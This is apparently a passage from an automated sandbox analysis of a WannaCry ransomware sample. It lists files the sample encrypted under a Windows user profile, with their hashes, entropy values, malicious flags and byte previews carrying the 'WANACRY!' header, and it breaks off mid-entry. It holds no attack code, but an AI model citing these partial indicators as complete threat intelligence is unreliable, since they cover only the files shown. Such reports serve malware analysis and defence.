                                                  SHA1:EED081AFDFD2143D8867FCCF61454870090BD4A5
                                                  SHA-256:07420A077903164B9C0B8B5232552696C331918CD02A9200C50C90BF59C6533B
                                                  SHA-512:F2C9C073253341E55E9A337466D6F8286B9F46B0DB1ADEAC00A282AF7FD1A43DAF83F2ADF0777EDBBD49C0B56036A14C2C9816D423B61B578995FE12FD56C33C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....?...{OG...>..`.FS.j.Z.....t@#T....!E....,.o..!t^...T.....z.......mx.U8.x.=..x....._.kX..X.d6.1Y$X6".."...&%=.o..#O......?I)...".f[.....p.$....6.u.6...D.Q`.....J[.3.N.H.%!.XV'...M.3....3\.*.M..........A..n...V...s3...`.I.......8.....4D...l...oH.....+7........@g.d.j....v..L#.T.......K.w.e.6.J4.}n...8..^.iop...3f.E...|%'j_..o3!.W..;....M...f.........c...w:....US....9..8..[.E..e.i...}..4"j.Z...3..iX&Xs..Q....}...].w.w..z.|.....9....x.k.S......O%Bi....8..X...j......x2.*.\q..JZ..(..7Bb..e...\df..>....d....b...0.Q..,.<Ip....*q>....P9?../...P....pN...LL.'....qP..~.'..C... .m.w....R}...l....O....<.s...1H.pv%.. ......"~......Q...:..R......i...tF6.IXH.o.`.h...-.<.j......~.=...<...)>.N..y.-^..&`..x. .bf...E.2..x.....v.....[n. ...i`..O....}}......o..@Hc....|X.'......6....73AX..?.V.#..X..m....([WH`{.[..DW..I........7..O..."...(.....zN...#SV......1.Y......}....T$.w.>5...R.<.....kie..".x.t@H....y.L.hF..,.b..ID"LUE;.5...`..[....0.E.;4

                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{8E108E7E-651B-4D15-9446-304CDAAB8AF9}mt10000137.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5240
                                                  Entropy (8bit):7.967989837924161
                                                  Encrypted:false
                                                  SSDEEP:96:o52vE6zH0XSLpsxtSTvzR1MlRFgsZEG1t0JFR7lz+R5aOdpQ6JPb3IojWmwWzG:O2MQuSLlf0RFhZr1OJFPaR5JYAPb3Tz8
                                                  MD5:C06A5FB8F9C814ECEBF5873648AB08AF
                                                  SHA1:898430C41DA22779F2FDFEA6A35725B6F1FC140B
                                                  SHA-256:8F409554C60C1AA33ECE8C12C8AF2A02915D4897A40863A2A3CB73DE7650D639
                                                  SHA-512:D840C5BA79BCE391D388B104C49ED763C5DF30DFB83BC1270BC5566A5FCAA68426A3EC9F0B08F65337076DBFE552D2AC818A44A74C20C7B837D994C36151877A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....fo1pLd&.....~[."...wc..:.\|9W.p..^.5.`.".C.^Dn.b..=F....f.C.g.q.........N.n.:.D.,.WXgp..fZ....m..F.....).6.....u.<6.. ..].r.t.).D.....k..A..8...>.%t.|y...@.G..g..E...Y.D.TQ..Pb...8...D.`..qHX..2....&..."...AW.v.'%:.v...t..;.&.S|t._.x.+O[...2..E...._.........T.2V*N,.Dk.ng..u=..a ...a..=4.co:...i`.."..Ua...?fv.!.q{-.\........e.....&.4b..|m.....,.0..T..{09g.2.<..s4b.S&.7.t...7]......h.Q..7q*...Zo..=...8..w.......@.]....|....<$.....\....d..Qd..H.....[\....+..G...%.Kg*x....-.:.{._...Y.V.A...Sbi..7..:t.N..9.C.s...n.c@.]{..q.;@O..C...L..})....$...Ax ...N.i...-.OQ..|.....x"..fpQ.%....Fsz......v..L..t....[.....&E.'.J....s.n...@.O'y..L...v$T.....!..*%.*...r..1....`.\.W...2.U......*..dKB(.....`...lu!......2.....4....../$`.5.......ZN...."].....?.L?.GK[..~.zV.....E...7.).o^..Q.E..^OX.....Z".w.~....0.......o.#....e.r...............@"..c7...}...z..Z. .B....>..6....9.6.../..c.............V......7........y'..q..Sbe..</-.e.$n^.c.......i...J.B.(.(.<..W

                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{920EC2BC-61C3-40DF-86C2-1E647F210A9F}mt16400647.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7384
                                                  Entropy (8bit):7.975012600649983
                                                  Encrypted:false
                                                  SSDEEP:192:KkUuSpKeLB9LdRcph2jJBZVhlFtp0RcRnUL2Bvi+Ak:KkUVXL3ov2jJxfC2B6Zk
                                                  MD5:BD32F4E0CEA6512AE2BDE41D8060C9CA
                                                  SHA1:736F7E75DE5120B271527299479598F867A9F348
                                                  SHA-256:EEE2823ABB4B5C7BFA39E89F6CEFE8F24B4FBC9F272DCFB878D1B58501017B98
                                                  SHA-512:AF4E028789096C2928CAA965AE412FACADBFF12DCF316D79D68948BA3BE8632B2892B6C3499A2C57FE73C740EBFE37B95DBE89A29D6644C0BB318A6D9952E264
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......X.s.l...A...T..n{1vM.v_...R..n`M.@e.by.!...p..b..D..xty.3..p..R....V.{2......;..: ...c0.v...L.b...*/...S../.a..!BY.D......J?...B....{"...<...W-.........hv.......L.....ZvV....a..J.{.F9.........#d....Z...M"...\... .4.F...pje.."..........I.#\.............RD_...^...u.. h.....>.d.j.J%w.......D....'.^..C..N.0...k.........Tgv....<YV.....>..q.p..G.:2..5T..9Y..;.F,..,K...%..{ ..@T..S..@...Yo...r...........-c.......E......8.>P....@..[. ..<jo.F...}..1.H._Y.}.$.Y .....Y./.b..|......@ig|l.n..........d....t...T...Q..y.R>o/..0.....G..Z..n)........8qEo<o...E..755...7_.67....b....w....i=...Z..JL1....J...V..-.7..-.......U.~....~....Nb^%..^.hG....:UJ.Rp..D.........8.)... &...-w...x.5.u.T...D.F..;..>.X......p..n.L...PY>s].k....gi.NU....r..%.......R.Q..>O.....G.d....!Enb>.}Wc...x...SH...#X\.. 5..3l0q$.....rvA..{4?.m..............-..h%.Tl......=.nca.Mk-8a..^.+..wP....4>.....!fh.m...H.C:I..G.[T_.-.7pp.m.0. .y...w..~..../.....P<?....sY.....>kl.

                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{A26B3E48-AE08-4429-A0F3-46650603BDAD}mt67739505.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):9032
                                                  Entropy (8bit):7.976801201794676
                                                  Encrypted:false
                                                  SSDEEP:192:KDnMOxG+BkTLhFokKFy2WF4pDsJF2lWaNmv0HZwen8i35quhc2:KomVGTLh+MFKpWF2Wa4vin8+p5
                                                  MD5:8AC5DFAB471ACA6EB4AA4BD919B38357
                                                  SHA1:A18EC056B1543603797AC11422EFC467C9DFE56A
                                                  SHA-256:A68F856C0925D0ED1E3C763A52C1DCB2DF6B4488815558DF2F58A9A3D941F600
                                                  SHA-512:00DD6878F5C38326EEE8E150A41D216EDD1681B9D41D198ACAEAA1A5EE3AB4030F0A433BA94DCC60C14A48D8C3ED89236A5F9CF29E0336CD08EBDCFA3D8A1236
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....p.jD..w]..D..........p.#....:]H...h.orQ....A..X..-.'-...;..@|...ZH1.)O..^Xl....g.....D.....8l.p..Z..t..|......O.+ds.<.S....(..&....L.'...|8..j.-zS.>...jo?.a.7h.....u09@@t..9I..[R.t...........{.wynb6P..]F.*.....".......X.....)T(-!ME..r....b.......*".........{ .......S......5....EL.....i ..e.HA...ym..fhX1.X[N.X__.~..C./....IVd{.r|.._.s.v...w.B=..H.q.n..Y..[...G^5..E...s..\~..a..r.8.M.."..U'... ...Z.....3.=..Rw... Y~...z..F.Rw...!.........6X..,....e.t...GD...._...z.4l....Y.>.?,x..B....m...A.G4..%..'...<P.4.iQr......2F.:../...n...bn....@...#b:...W..\......uymL....[.&....-yCwg..c@..u.....7q..u.p>n8O....A.4$.Ny.R.\qYs.P...? R"........./..(.R.;..ak....t......... a..P..v....l.[.4qa.58..7...w..vP...B.G.....<..j%=.#..=....-.S1...."..........0nTj.)...k.Y.....`...nU?jnu,........7V.K]P..)...<n.....nC...{,.?..j.%sfV.5..Wz.DN.3.a,YVA..P....*..#........8.vC.p.D...P..aI.h...@.P.o.(P`..~j....y6......*..[.X.+...~....qX^....E2.v.U...!P...6o8Ru...

                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{B1076C7E-1A13-46D9-84EB-4CAAC5C83618}mt66963475.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7960
                                                  Entropy (8bit):7.9759972955320215
                                                  Encrypted:false
                                                  SSDEEP:192:rBWa2T2olBu2aqCsXLsu7406ePI/zfpcBXgbGu1DH:rBuHu2aC7Ta/zxcdu1DH
                                                  MD5:B400928E141D7FB9EA2A581A645855E4
                                                  SHA1:D2FE057F84BE61443D4FE20C4A9FB9946DE4ECF2
                                                  SHA-256:C3B6A4FCDC4E17471FDA95D99C498AFA0EF6966664268DC4983494AFC4F3104D
                                                  SHA-512:4EC1000CA3E057DE4BC5E6D51FBC23293A000D9754F03FFB63400C834566E7BBFA2AB79896117EDDA137CB4CC9CED21A0B8C3E6C45A00FFC91B4C2128EAEE889
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....cE....g.rO_oSI..p.../A.hJn.....[4.8J.'....l..@..U..m.}O.Q9\...PQ....=.W5..zO.....R.s...cE..=V.O7...V.-^..`..B...d..../...z..J.8..~4&._.x....ct..Svr.V.zK....)..*........1(.{h^...of*....*c?...r,..?.._.m....R.( .#Uz2..p.bK...=..5~...f.7.bb...nH\............5.n.x.2.c....#...`....QM..7.....<....+....5.".X.......]{h&l"3...s/..OuHkR...kp.K..&.\^.........%....t.W.XS...5@...6...........z.O....z....\:Z...^.9'."._.H......v]...#gm.Ht......@-.....Km.dq...#.Rs.r=.......!..X7.u6.."....!...{.7.;4t.H.8.e2b\p...K...V......0........*..1.*M'.-r.~.C...........}n).jN..q.>.qE......]....Y.)/..T.T..Q....f.=u.!..W...Z...`..s..H.V..87).R[......6...).Ca....t...GE.....\n5.@d..?T.P.(x.>.>\.WB6:I]..g.{......._QL.....K..4;cDs.@p1MfQ.......7..%r.}xaH?F[...z....9.......0..T..?.j..U.).:...r..a?5..kmo~......9b...s..),g!i..<Dk{n8NR.q.h..][V??$......$f..T.....U......c....'. ...../..>...1....o....i'...4<..M.....k....z.2I.B...<....t.....o.Yf...E.a.........:.Y.

                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{C5106F55-DE69-4257-BD69-461E3E514242}mt16400656.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7032
                                                  Entropy (8bit):7.976870913276875
                                                  Encrypted:false
                                                  SSDEEP:96:ovcJcmUmXQTva1YVS3ux5JtJEi1+3UvKE2qd9dz48CecsEH/lRSJnwIG17/axukz:i1Zv0YVOu1tJsVqd7Cek/lKqLMg24d2
                                                  MD5:5CCC85016361EA944F66147757ED532D
                                                  SHA1:0D547DAD5144BD9AE5342F648AEBBC52AEA220D2
                                                  SHA-256:8F31BD7B31FB11604D13025F407F289C169254BB76610A187E9A0490CB9E49DA
                                                  SHA-512:35BDDEC8DE3809A8B751A06E53A587FF84799E95F19113470E221FE6A0D25EA47C0DF075293DFE7C6BB41374C6817B3E66268567EDED93ED8C781A6413A0B2B4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....eu.n.;..9=hk.k.0k..(_..ek..N...{....>f...g.Ed.&"...{.q5....M...aKA..gC...b.....Q.......7.l.....L.O.......ME.z.T.wR.j..Vt?....0+..@=..#.....L.s...1<5.r.( ..q...).X.(.Kv..J..bT...6..w...M..gy...hS..<..@.:......Q...y.w.y).Dc.Ek$RO'd..q......]...}....T........5.V..2L.....cC.y..r8..A..`l'.....f............3.}...\.....^". _{....w..D...$.....Do..s..QZ.l..`..-.U.....Q....0.3.;..w.....Q.D.C.9.^......].A.I).)..D......R9..w`.._..>..T.......<.v.aVk..q......Q.\..w..Kg.I...Y...9.c..P3.gX$.U,..t...Te'.G.\ .U.......j.yZ<..o...kLZ.X.V.+!?o.T....d.bW.>B.....C..:.....e.[\w./H...Iv.1.RJ|..89...Q.G.rH.:{..O...!....^CH..t..u|N.EM...=...qhY.{~...5.hV.....H..U..d...K^.Bj.zYi.j.n.o'>../.i......6Y.".;!.)b....1..Z\.a....O...L..52..1.t7.... ...=.5..{...............c.j...x.....@Z.AC93...:......:1.....I.D.tB..n..@.5.B ..3....1...L...8.6.dH..Gb!.+52(.$...7..g.k...!H./e..:$.........(...."U..W.k....G...K.Z..0=.Pj,+k..:.y.JM.N/.V...8....-.&.*'..cp,...,..`

                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{EBE7A16E-2C11-4DC5-89A4-976E33A0596A}mt45299826.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8792
                                                  Entropy (8bit):7.98118153501082
                                                  Encrypted:false
                                                  SSDEEP:192:vEg/mNjRpO1LJn2HwMJWBxPUICdFb/73W+DFLkcysQ7k3RSyM:teNjDwn2HKxcIo/lDFAcy57k3vM
                                                  MD5:338A2B6228F4D71AFB0ED0D758304E8D
                                                  SHA1:CD8F464F8C0B44A2BF08551B1EA35D889507E439
                                                  SHA-256:FC9159632D56032D025604713AB8627596D276E4EA967D1FE8679E04064AF485
                                                  SHA-512:1A9462BC61AB3CF2D2DC2078EDDA1417FBAE79558CC5A20043E93DFE7E681E5C47081507D323118388BE736FC43D3647DC94F262E2E9170E105524230A19B96A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....p..)C.<U..[....7...S.1,...'.D...P...P;.....E...}.&'`.-&r...H.P=7.[...e0.-.....IA.H..ZN.z.....W...0.:*...>..#..l.&..nu.w....*.........8.p..E...=e..}.D./..mD......>......)rh.`.....:.P.<..{s.,.Y1..u.....|1.0a..\C.u...r.1..^.%.. ..}$....X.{......2!......u.y.T}.........h...1v$.A;..5...%.K......C.._.A......<O.;..].Q.w.......G"]..S.(Y.w..V8....7m`P......s.m......J..N..3.2....\......_..{...,...=W..q. ...o.h0QU2..[.Z.1.\Z.g.y{<.VV...k>..A9c(..G..=.?...[.....T.......!.d.B.Mp..@.j.<..f[Mi\.J($.O'....i.E.......#.r..q^..[....|.$...#....`.2s...*:t.6...Q9.x..../.L.%....4}......,.G#..-..........B.........!|....z.f.{[O2...&oi)|RD.).._.......3X..'.pP/-....G.'....9.#...2....:.Q..0...(n}.y...2.J..kM...>i..e%..N_./.p.o.H...|'d..t)..Z......;.E.S>.!....A...F(..8...>..B...H[`.g..)O<#...}XG..b..=...p.o..(l(.>:...UBmj.'......1.....k64M.^c...g.....N..c.o.n.._..8..^...._.L...w.;.2.(.....v.8..Xv..."Ix..o.-!$+.N4)cv.l..!...]q...E0..S..I.9.z.&_

                                                  C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):24856
                                                  Entropy (8bit):7.993654638560137
                                                  Encrypted:true
                                                  SSDEEP:384:hscbsEmTk9Ne/74SY4k4++5YoDLXbW4xVdDpKb9zR7pVOmAzQurM/vMRfkJ/CPs:hscg+No6dALLPjds7wzQurM/kiqE
                                                  MD5:10EEC7B1F7A51A4AAC837A40412E236D
                                                  SHA1:1E21E1D8ECDC125FF1263A53AD284FE3F2AD6823
                                                  SHA-256:464E89EDE4B9E98F0762201F3C0C1F247A200DF2C6098F9645E042534C89FB8D
                                                  SHA-512:34D217C264FE619B269C32A7CC05A06C99C677A4CF0F16CB108C5141A4D01C9C4375CA8D0932A6CD0229C1BC6DD4C8F83F4F8AEFB429CF30EEEE9F86AB1EED32
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!........8<d7.T..K......._.....{..a...B.....o..].V..P...kY.c.E7....<...A.Z..z.`../...:>-.....mPWY+.....u.X.1o....U....qs.3.r.E...u.H/id4X..E0.....'.G..........s_..mA....@..=4..}...w&.....3.S.3....4.Z.....R4...{h.a..\.*...iM.c.[UY{...K..'.R....F.......`......!......[D...O........L.....Q..F....;&-t.).A..^..xT..p=......g.^S....`FY....R.P=...]....D.l.x.>`.x...uJq.@.8.y...O.Q....L..^.u.;..~......:.f.:....N.1C..|..5.I.4......Vo..HK..\......vj....g.r*.Z....!.....2.B.....j.{......9....c.xs..<nn....l....d~...[...J....{..n\..H...5.5.q..->.7....=..{E......sk. .+..^.~q5.>j...l.:^Q..G.0.>..pg...{=5..*R:..7w.:.......y.../{ {..y...i...6.......5.g..........7.NG.....e.Mh.h.w.}.?J..]..._.X._.../.P.u.\Q.o..}.<..CN_.x...-<..j.V.P..w./zL....k......Z0"X.!.ky.-..Oygy...k;... ..d.o#=....._.&...Xg..6.....fo..._p.pd....0+"..m.<...a.......6...f.kMQ=.9..t........g...b....Dj..`.....m=#.eO.@.g..i.=.?.".L....z.8..}#.Dy...\.H...q...........x.}...yV.~_X+$g.&..

                                                  C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):24856
                                                  Entropy (8bit):7.99310446080802
                                                  Encrypted:true
                                                  SSDEEP:768:LNZTLyh/H8lzqkurhbJd83TyYwz92CS51Fzsma:fCEe2DyiCS6n
                                                  MD5:557FE311D8A3E91235341926CBC6FE14
                                                  SHA1:76BDFF37AFB378586751211C15D496686A90ADF0
                                                  SHA-256:C65BF83AC5500E76CC9EBF8B866F2B979B686BD4864637ADA97B5D8F9DFED9E1
                                                  SHA-512:0BFA140A9F6CB114DB974A3102B124153D32AE7481AD8C7ED476ECB4A80628EF9119DDD312DAB0B8931DC0404D82A8F7FEF970D72F8059E553A0E69CB750FCF6
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....$...VL.I..{.d..T)....1G.....+....U...E..X...#...|.o-..7DkPf....#.9..r.._7.g.Kt...a.D...w.#...2...r.S~....6.=..k*.]m..@..q..L.I..Y.-H..U...c.N......~....^.....Xp.q.D'.J .i......G....k..<..K.$=5..I......"...,....L....z...O@.+.......s....V..A\y. 2......`......@...a..n.x........(W.G..5..*...].k.:.....n"Jr.{.b..;]..W......e.:...zxIX..g......>...s...Z.6....'......me..1.;:..6V9......d....7..(..)b...==..Zd........JR.....Y5...dCIG-.zn..Z.R.UnFD...Hb..(...C...-SV~e.>c..$V...H3..o.o$hC........& g....M......Zh.:..Z.....q..=...+v...p.^.........0n..<iD#.a'...G.0p.q..=.E.......r|...<._..W......v.J.m.+.a..T.(_.`..T..O..H.Y...S$RQ.....$^.p.P...N..L..Wm..U."C.).,...&&TAMvS.P.7pc....|.x...474.A..R.m...F.6..@..%.R.../.....C8........D.$s...[e.|...ML...b.L.+4.lq.i....C%....S.p....yo,Y.m..b.Z.k../........'.$o]...7.hx.}-\67.t63..._J.g.|......).M.B.17.MN......q......eT.!.(..`...C..FM~..V;....).#[...49...V...T.P....h..m..@;.<..Ex&:'(.....T[A,.X,D.e.o...GJ_Sj

                                                  C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):24856
                                                  Entropy (8bit):7.991603722591334
                                                  Encrypted:true
                                                  SSDEEP:384:r6fCfpAIoeBrZti501llPnFJXR8J3i8/kTx5CVIZhAYAP5sTO1N2jdmEVJE2:r7vxTFFJhh8s+VBYEOwq7JE2
                                                  MD5:AAECEA487F195A921EB5F04D76036A4F
                                                  SHA1:0D3DF0A50D891F94247690ED989B41F0ADB70989
                                                  SHA-256:EA8682E72F5A776506A753CF10B81F42DEF83852BE62DE599A4E528157DB9C2D
                                                  SHA-512:FAB722E4816FD5B25B8CB64E6BF00EA75BEAE77C88D83CB6CF981D624167904CCEA168EBA4AEB9C8896C471951D0EE21F4995E65EF768B6573452D0C8A5CC526
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....7`I......9Fg.h..i*.Q..Fg.4.-..h.^...h.$..U..1u._.._..(....E.....J>..H..I(2.TaDy\u.y...ajP3.....k<...b...".V;.^L..H...\..a....O:..F.%>.1....1.un..:$..Bq..........t.>.~+QiK...x......7.d.<q.E...+..U.8..*.s.."F^...<1..F`.*dn.OA.-Z.8....n..<.\.\19F.....`.......$.x-..n.{.K...V..~....@.#.E..@.7K..opM...'.D/.j...7O.h.P...3.]/.k..#(3i.N:.bT...04KG....x.................2...q..R.MMJ|.CZ.p.....&t.3......{c.rU.6fT....q!b..*.Ji..;..a........nd-._......<S.......X.5E_.n.....a...n...w.A.d....(....U.|".6t./15.G..H....g.(.."v..VL.y.;...r...E]..(5........l>.1.tt.0.TCl*.u@DF....7..De.}t.U......x.]5,..H...wcd...I.t... @.^......\..w..|..`Nb.).....$..y....q7t+\....B.S.D.V.).A7.....`.@`c.`6t.x.erV.j..5$...s..+. c-..o......\A.!}..*F.5#..........kSC.E...%.ZA`..#.W.......Ad..Z.P..l.....P...!...v..a..7/...6.A......<5..JvV.3..>...X...'...Jb..-H._.89..@.....|...'.7.;.M75.......<..P.}..r.x...)._....;...96..4..Z.l....$#....D....z.@...l.v...+......9....<r2@`

                                                  C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4376
                                                  Entropy (8bit):7.957811386775664
                                                  Encrypted:false
                                                  SSDEEP:96:oL9dPaGwl8dF/UJj5+61TCPSvHAlZdJrqRCisyfFncu9t:edL/UJjR1nvHwdJ+8Wes
                                                  MD5:1EAE4380C9983EA9B568260D7B4442B4
                                                  SHA1:98043C621103F9FDCE6C8E7E99BA888664B19310
                                                  SHA-256:2DD65C03403671D1439F2C31F441A81AA779E8B518DBAB0D7E7216A31FEB7208
                                                  SHA-512:2406CA4B2332771FD303A956D8F940F21EF3D7B418B712AB038CEC822792815A1E36EA28C8B3E9418D61B71E54255EEBA97C42E991DD3D0B91FC53AC451B373A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......:..O..B..g<...H..q.2..Cd1.b..d......V...7.&....oq.....tF$*...^.P..\;En....j.)f..M...c.t."...(...N.m..+q)~d..kz.jK.PJ.._yJ.+.^...*7.E...N......L.!<.%..c..F.$3..ST..g...L`.P..0.3=J.yO..6..a.H.....E...@'K0qH.....6.a.T.UY.l.....8..`K....3..Y.................8...+.^=../.Sh.\.....Uj.nq9.....`.6....H&s..".&..(."....G+0{........u..ma.e..M.h..6.{...V%r....1.......|...h.^..%."o....J..........ih.,8....}.o..c......)...}..3.X...|./..O..7..%.nd..F ;[.V.&.b...I.X.....=.M.....*N5.]...A{F.....D....P...m>.....N.].1..../..;h..............&.. ..C.........n..v$.._.L..'.>.m._...ye.U..D..$...c..0/.+...m..E{..MQ#.K..F@rM".o.....5TN.!.57........t!....Z..a...l....n....h.n.i.`.R.~......^G?..7{'..[.I..z.(*....h..,D...g....~P.w$.e.U).=.'.CO[............r.....5w..B.R.2.9....fg.gQ.Bj.>A.4..N!.W"......W.:.Z..E..2].:....(./.W......o.#-/.....A.lF/..T.>.Z<*.......w.Kd.......Y.r$.+O...V.g..2...-p.:.=....<.g.R.."...B4.E.].y/,.d..w.I.*9....3..V.\R|

                                                  C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):24856
                                                  Entropy (8bit):7.991609432094003
                                                  Encrypted:true
                                                  SSDEEP:384:xOGxkvizEgEnVlgzerU0RaaBQegumil7HPHA3KFRbIzFgyO06hiSw5VI/DJnTchY:x7bAgHerUKeUH7Hf8gRbYWt2u/DJnTc2
                                                  MD5:B706078ABE47D56A9AE8AE3721E9205D
                                                  SHA1:3AA43A5599A290079116B50A74DDE8999FE1CB46
                                                  SHA-256:FD063900EDF6964C0B9091581B54D42DAF4525C22975C4F56B933386C56060B8
                                                  SHA-512:BA32EDBFA3BBD29AE0484236369F097D299B7452DD4966FF4BD12EB5085197A265625D2CA138368A37C48EC35F4783FCD87FBD1270E01859055B50D20B15D002
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......%.hm.zPE....eB<&.3s.oZ....mC..+...4p.:7..g ...]<7.W.PG.....}..8#.O...8....0HynI~."UvI......-...;.......wO.n..G......Fk...>(.......|...[..r*=a.g..j.xq/........>.0....I...Q.........f\..Pu.*P{..s.8..&....`...a..`.C'g+..^.....AN..,.Y..2._wj.8.....~.;.....`........c8.Y...VB...`.>.A9....[b\.FM..R.g...BHp......1R."r.Mg.#.m...x+...Lro..M.9....]'.D#.b..r....."...)..d.uY....*d..[...N..Ql`..o...".....d.....Bo..B.;...j..g8..I....6../..Z..vOR....W....YG.E.P.I......ci.rK.W.?..v...hiA....j...q$.Y.....I.H.'.C.ns.)..\R....~....`..|......q..:..)...F.~AA.G.*n{../...bi.lv...x....p.]8bg........-..`..'Kd...N....:}C.k.&A.l.sy.:k.cI.......I.b...E..4....+.P.*...v..H<..r....E.R...c&JP>..A....^s9v.^:....&.I...yZ/$.yA...@.7*....p1'U.. .."U..X......;.tm....t.#V%.D4K.a..6_~q...~..g..w1*.$.6Me.e.....x.,.R'..g..m..iy7]..wWrF._...px1..^x2.bvKlc..[..'9C. |mux.Z$.S%.%-6..^Jmu.=B.........o.H.NPA/.0d....P.HE.$5.!8..O+|....._.....t.&.y.cM..;...)...l.+..)B .Ae>........

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_251_0.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7160
                                                  Entropy (8bit):7.9750510138443325
                                                  Encrypted:false
                                                  SSDEEP:192:ZM/oCBCsX3KD7JM5csiIgXiMSTobyrxL0kuJncY1:UxBCseJM/UbyrxLJA1
                                                  MD5:599D6924FAFF32C236BC2AD5CB01852C
                                                  SHA1:FE8E27F94CB70174CA78CF0FC0F062511957D2F8
                                                  SHA-256:2654DCFE5ABD856B54173604A85A8DC78A069B33CEDC2D04F2971D8E7E68BEE3
                                                  SHA-512:7BD2CCE1A8E97CA97936608616CD1A258D33FB7F187B9AA55DA244C317BC760A069C1512BFA79CB28FDAEB9E48832390DEBBD1059F0CB7EB2162D92FFC132558
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........l.a. ka..\\}.6o...QS.|.).O+aR.w@D..b........&/..-.k?`x#...qC.....z.iu..E..e...'....`My..c.G.J.kH.G..........H*_i.d.Qk.k."....m._.O.0.n..........O.....^6..6.5'0.l....i..n....JqN_..(....n.......gEO....L...S.J..u.....S@n..<..Vh.....(&E.Q+...i............:.u.}......W...z.m&.@...%.2EaL..f).3..8]qa.?.r CY....Z..C..M.%#......K....7....S...........,"..,"?..(....T..(....@..Y..i..?../-..~e...k.9...c.=q!.&.../E.B./.._....Hm.zuR...F.'p.]m.RS.x!.S L....!..:%.>5.2..#;e.#.{#.....B..@.P.....p`..U.bs....5.}.?...Ay..Z.....Z.R.DS ..'.h.b.5x7..`di?q.aG.~.8V|.l...l..[.{._'Ew ..P.7D.d s..a.._.c.u.u...c&....;J....9.$[...r..S.......R..........~.E.Y.L.cw2).FZJj.,3.{........b.v.a-......78.....1E9.A..i../....%....V..k..J.)`s...;.@a..;....t...K.a.Uu...-1:W....N..SCo.Ff8....D`a~8c.Qcv..33...u^0......4....F\..5i......R...tNE...`..lLL.E.@..{.a.F.T4_{..7.}.V..`..<..=...i..'C....j....t.y.......X3.`..@.0V...J....R.3...OZ#.9...rA...hv)+E.M(..0..p.?.1.......JE..

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16664
                                                  Entropy (8bit):7.989160268014634
                                                  Encrypted:false
                                                  SSDEEP:384:YlRLbDYErSyWsRy51XduSVl1igJEJSmKetHYdg4yQZ0J:aDrSyRRy51oSP1igQKqYdfC
                                                  MD5:43FBF3FF5CC2932B49CA7D3957C674B8
                                                  SHA1:60E13CD8B38BE3851B84D67F1EA9DD5A2F48AE9F
